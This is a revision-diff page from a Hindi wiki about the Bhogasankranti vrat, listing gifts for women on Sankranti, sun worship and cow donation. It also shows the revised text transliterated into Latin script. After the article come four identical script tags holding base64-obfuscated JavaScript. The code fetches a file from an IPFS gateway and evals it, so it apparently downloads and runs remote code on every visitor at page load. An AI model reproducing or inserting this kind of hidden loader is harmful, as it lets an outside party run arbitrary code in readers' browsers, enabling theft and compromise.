Difference between revisions of "भोगसंक्रान्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*[[संक्रान्ति]] दिन पर नारियों को बुलाकर उन्हें कुंकुम, अंजन, सिन्दूर, पुष्प, इत्र, ताम्बूल, कर्पूर एवं फल देना चाहिए।  
+
*[[संक्रान्ति]] दिन पर नारियों को बुलाकर उन्हें कुंकुम, अंजन, [[सिन्दूर]], [[पुष्प]], इत्र, ताम्बूल, कपूर एवं फल देना चाहिए।  
 
*उनके पतियों को भी भोजन देना तथा वस्त्रों को जोड़ा देना चाहिए।  
 
*उनके पतियों को भी भोजन देना तथा वस्त्रों को जोड़ा देना चाहिए।  
 
*एक वर्ष तक प्रत्येक संक्रान्ति पर अन्त में [[सूर्य देवता|सूर्य]] पूजा की जाती है।  
 
*एक वर्ष तक प्रत्येक संक्रान्ति पर अन्त में [[सूर्य देवता|सूर्य]] पूजा की जाती है।  
 
*पत्नी वाले ब्राह्मण को गोदान करना चाहिए।  
 
*पत्नी वाले ब्राह्मण को गोदान करना चाहिए।  
*ऐसी मान्यता है कि कर्ता को सुख प्राप्त होता है <ref>हेमाद्रि (व्रत0 2, 733, स्कन्दपुराण से उद्धरण)</ref>
+
*ऐसी मान्यता है कि कर्ता को सुख प्राप्त होता है।<ref>हेमाद्रि (व्रत0 2, 733, स्कन्दपुराण से उद्धरण</ref>
 
 
 
 
  
{{लेख प्रगति
+
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 10:30, 24 November 2012

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • sankranti din par nariyoan ko bulakar unhean kuankum, aanjan, sindoor, pushp, itr, tambool, kapoor evan phal dena chahie.
  • unake patiyoan ko bhi bhojan dena tatha vastroan ko jo da dena chahie.
  • ek varsh tak pratyek sankranti par ant mean soory pooja ki jati hai.
  • patni vale brahman ko godan karana chahie.
  • aisi manyata hai ki karta ko sukh prapt hota hai.[1]

 


tika tippani aur sandarbh

  1. hemadri (vrat0 2, 733, skandapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>